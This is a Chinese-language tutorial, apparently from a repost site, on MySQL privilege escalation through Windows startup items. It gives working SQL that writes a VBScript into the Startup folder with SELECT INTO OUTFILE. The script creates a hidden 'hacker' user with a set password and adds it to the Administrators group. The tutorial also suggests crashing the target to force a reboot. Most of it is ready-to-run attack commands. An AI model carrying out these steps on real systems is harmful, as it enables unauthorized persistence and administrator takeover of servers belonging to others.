数据库初始化查询(数据库提权开机启动项提权)

开机启动项提权

• 开机启动项提权原理:利用mysql,将后门写入开机自启动项。同时因为是开机自启动,写入之后,需要重启目标服务器。(这个要求mysql的权限就很高,至少是管理员权限甚至是system,可以利用一些漏洞尝试打蓝屏重启)

• windows的开机启动地址:

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

1、利用UDF提权得到的shell

数据库初始化查询(数据库提权开机启动项提权)(1)

UDF提权的到的shell

2、创建表

create table dota(cmd text);

数据库初始化查询(数据库提权开机启动项提权)(2)

创建表

3、插入数据

insert into dota values("set wshshell=createobject(""wscript.shell"")"),("a=wshshell.run(""cmd.exe /c net user hacker admin@123 /add"",0)"),("b=wshshell.run(""cmd.exe /c net localgroup administrators hacker /add"",0)");

数据库初始化查询(数据库提权开机启动项提权)(3)

插入启动脚本数据

4、写入开机启动文件

select * from dota into outfile " C:\\Users\\Administrator.WIN702\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\adduser.vbs";

数据库初始化查询(数据库提权开机启动项提权)(4)

写入开机启动文件

5、查看开机启动文件

数据库初始化查询(数据库提权开机启动项提权)(5)

数据库初始化查询(数据库提权开机启动项提权)(6)

查看开机启动文件

6、重启开机启动

数据库初始化查询(数据库提权开机启动项提权)(7)

开机启动

•开机启动,发现 hacker 账户已经增加成功

,

免责声明:本文仅代表文章作者的个人观点,与本站无关。其原创性、真实性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容文字的真实性、完整性和原创性本站不作任何保证或承诺,请读者仅作参考,并自行核实相关内容。文章投诉邮箱:anhduc.ph@yahoo.com

    分享
    投诉
    首页